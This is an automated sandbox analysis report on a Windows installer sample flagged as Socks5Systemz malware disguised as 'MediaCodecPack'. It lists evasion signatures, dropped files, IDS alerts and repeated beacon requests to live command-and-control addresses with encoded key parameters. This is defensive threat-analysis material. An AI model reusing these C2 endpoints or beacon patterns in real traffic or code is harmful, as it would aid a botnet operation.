Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
steel.exe.3.exe

Overview

General Information

Sample name:steel.exe.3.exe
Analysis ID:1577455
MD5:db153670ed84a7e848fa356e7aecc80d
SHA1:7c6be83fc3b7af9c5980c6d46a4a604b7c878ebd
SHA256:ba58d3f14d7e106b3ad8d60501bdbcaf19506731b5085d478d9a0887e6b0b524
Tags:bulletproofexeuser-abus3reports
Infos:

Detection

Socks5Systemz
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • steel.exe.3.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\steel.exe.3.exe" MD5: DB153670ED84A7E848FA356E7AECC80D)
    • steel.exe.3.tmp (PID: 5472 cmdline: "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe" MD5: 192CB1EFDC38E560F417C173410B8749)
      • mediacodecpack3.exe (PID: 5544 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i MD5: 1BADA3AB49364C26DA68D41031611AC7)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-VED6B.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000001.00000002.2981700405.0000000005BC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000002.00000000.1743204779.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: mediacodecpack3.exe PID: 5544JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  2.0.mediacodecpack3.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T13:44:58.587503+010020287653Unknown Traffic192.168.2.449737188.119.66.185443TCP
                    2024-12-18T13:45:04.162347+010020287653Unknown Traffic192.168.2.449755188.119.66.185443TCP
                    2024-12-18T13:45:06.653285+010020287653Unknown Traffic192.168.2.449761188.119.66.185443TCP
                    2024-12-18T13:45:09.025805+010020287653Unknown Traffic192.168.2.449768188.119.66.185443TCP
                    2024-12-18T13:45:11.275909+010020287653Unknown Traffic192.168.2.449774188.119.66.185443TCP
                    2024-12-18T13:45:13.603425+010020287653Unknown Traffic192.168.2.449780188.119.66.185443TCP
                    2024-12-18T13:45:15.872940+010020287653Unknown Traffic192.168.2.449786188.119.66.185443TCP
                    2024-12-18T13:45:18.301991+010020287653Unknown Traffic192.168.2.449792188.119.66.185443TCP
                    2024-12-18T13:45:20.934363+010020287653Unknown Traffic192.168.2.449797188.119.66.185443TCP
                    2024-12-18T13:45:23.260152+010020287653Unknown Traffic192.168.2.449807188.119.66.185443TCP
                    2024-12-18T13:45:25.702931+010020287653Unknown Traffic192.168.2.449814188.119.66.185443TCP
                    2024-12-18T13:45:28.010091+010020287653Unknown Traffic192.168.2.449819188.119.66.185443TCP
                    2024-12-18T13:45:30.289917+010020287653Unknown Traffic192.168.2.449825188.119.66.185443TCP
                    2024-12-18T13:45:32.568917+010020287653Unknown Traffic192.168.2.449831188.119.66.185443TCP
                    2024-12-18T13:45:35.172199+010020287653Unknown Traffic192.168.2.449837188.119.66.185443TCP
                    2024-12-18T13:45:37.453939+010020287653Unknown Traffic192.168.2.449843188.119.66.185443TCP
                    2024-12-18T13:45:39.918052+010020287653Unknown Traffic192.168.2.449849188.119.66.185443TCP
                    2024-12-18T13:45:42.175675+010020287653Unknown Traffic192.168.2.449855188.119.66.185443TCP
                    2024-12-18T13:45:44.633871+010020287653Unknown Traffic192.168.2.449861188.119.66.185443TCP
                    2024-12-18T13:45:47.273710+010020287653Unknown Traffic192.168.2.449867188.119.66.185443TCP
                    2024-12-18T13:45:49.799807+010020287653Unknown Traffic192.168.2.449878188.119.66.185443TCP
                    2024-12-18T13:45:52.148792+010020287653Unknown Traffic192.168.2.449883188.119.66.185443TCP
                    2024-12-18T13:45:54.395265+010020287653Unknown Traffic192.168.2.449889188.119.66.185443TCP
                    2024-12-18T13:45:56.835103+010020287653Unknown Traffic192.168.2.449894188.119.66.185443TCP
                    2024-12-18T13:45:59.123987+010020287653Unknown Traffic192.168.2.449900188.119.66.185443TCP
                    2024-12-18T13:46:01.600396+010020287653Unknown Traffic192.168.2.449905188.119.66.185443TCP
                    2024-12-18T13:46:04.210833+010020287653Unknown Traffic192.168.2.449911188.119.66.185443TCP
                    2024-12-18T13:46:06.464108+010020287653Unknown Traffic192.168.2.449918188.119.66.185443TCP
                    2024-12-18T13:46:09.283893+010020287653Unknown Traffic192.168.2.449924188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T13:44:59.321192+010028032742Potentially Bad Traffic192.168.2.449737188.119.66.185443TCP
                    2024-12-18T13:45:04.886282+010028032742Potentially Bad Traffic192.168.2.449755188.119.66.185443TCP
                    2024-12-18T13:45:07.341047+010028032742Potentially Bad Traffic192.168.2.449761188.119.66.185443TCP
                    2024-12-18T13:45:09.711078+010028032742Potentially Bad Traffic192.168.2.449768188.119.66.185443TCP
                    2024-12-18T13:45:11.970395+010028032742Potentially Bad Traffic192.168.2.449774188.119.66.185443TCP
                    2024-12-18T13:45:14.300144+010028032742Potentially Bad Traffic192.168.2.449780188.119.66.185443TCP
                    2024-12-18T13:45:16.712134+010028032742Potentially Bad Traffic192.168.2.449786188.119.66.185443TCP
                    2024-12-18T13:45:18.984985+010028032742Potentially Bad Traffic192.168.2.449792188.119.66.185443TCP
                    2024-12-18T13:45:21.691519+010028032742Potentially Bad Traffic192.168.2.449797188.119.66.185443TCP
                    2024-12-18T13:45:23.944971+010028032742Potentially Bad Traffic192.168.2.449807188.119.66.185443TCP
                    2024-12-18T13:45:26.388621+010028032742Potentially Bad Traffic192.168.2.449814188.119.66.185443TCP
                    2024-12-18T13:45:28.718839+010028032742Potentially Bad Traffic192.168.2.449819188.119.66.185443TCP
                    2024-12-18T13:45:30.977003+010028032742Potentially Bad Traffic192.168.2.449825188.119.66.185443TCP
                    2024-12-18T13:45:33.376875+010028032742Potentially Bad Traffic192.168.2.449831188.119.66.185443TCP
                    2024-12-18T13:45:35.882009+010028032742Potentially Bad Traffic192.168.2.449837188.119.66.185443TCP
                    2024-12-18T13:45:38.164576+010028032742Potentially Bad Traffic192.168.2.449843188.119.66.185443TCP
                    2024-12-18T13:45:40.598925+010028032742Potentially Bad Traffic192.168.2.449849188.119.66.185443TCP
                    2024-12-18T13:45:43.032789+010028032742Potentially Bad Traffic192.168.2.449855188.119.66.185443TCP
                    2024-12-18T13:45:45.355222+010028032742Potentially Bad Traffic192.168.2.449861188.119.66.185443TCP
                    2024-12-18T13:45:48.150899+010028032742Potentially Bad Traffic192.168.2.449867188.119.66.185443TCP
                    2024-12-18T13:45:50.527844+010028032742Potentially Bad Traffic192.168.2.449878188.119.66.185443TCP
                    2024-12-18T13:45:52.835125+010028032742Potentially Bad Traffic192.168.2.449883188.119.66.185443TCP
                    2024-12-18T13:45:55.077137+010028032742Potentially Bad Traffic192.168.2.449889188.119.66.185443TCP
                    2024-12-18T13:45:57.544183+010028032742Potentially Bad Traffic192.168.2.449894188.119.66.185443TCP
                    2024-12-18T13:45:59.807945+010028032742Potentially Bad Traffic192.168.2.449900188.119.66.185443TCP
                    2024-12-18T13:46:02.411736+010028032742Potentially Bad Traffic192.168.2.449905188.119.66.185443TCP
                    2024-12-18T13:46:04.897599+010028032742Potentially Bad Traffic192.168.2.449911188.119.66.185443TCP
                    2024-12-18T13:46:07.434640+010028032742Potentially Bad Traffic192.168.2.449918188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459Avira URL Cloud: Label: malware
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeJoe Sandbox ML: detected
                    Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeUnpacked PE file: 2.2.mediacodecpack3.exe.400000.0.unpack
                    Source: steel.exe.3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49786 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-CJLSG.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-0BJ08.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-CJLSG.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-SHN24.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-0BJ08.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: global trafficTCP traffic: 192.168.2.4:49743 -> 46.8.225.74:2024
                    Source: Joe Sandbox ViewIP Address: 46.8.225.74 46.8.225.74
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49774 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49768 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49807 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49797 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49780 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49819 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49825 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49831 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49855 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49786 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49843 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49837 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49849 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49861 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49867 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49878 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49883 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49889 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49900 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49911 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49905 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49918 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49894 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49924 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49792 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49814 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49768 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49774 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49814 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49780 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49831 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49807 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49837 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49889 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49900 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49761 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49786 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49911 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49905 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49894 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49792 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49797 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49918 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49849 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49855 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49867 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49883 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49878 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49861 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49843 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49825 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49819 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
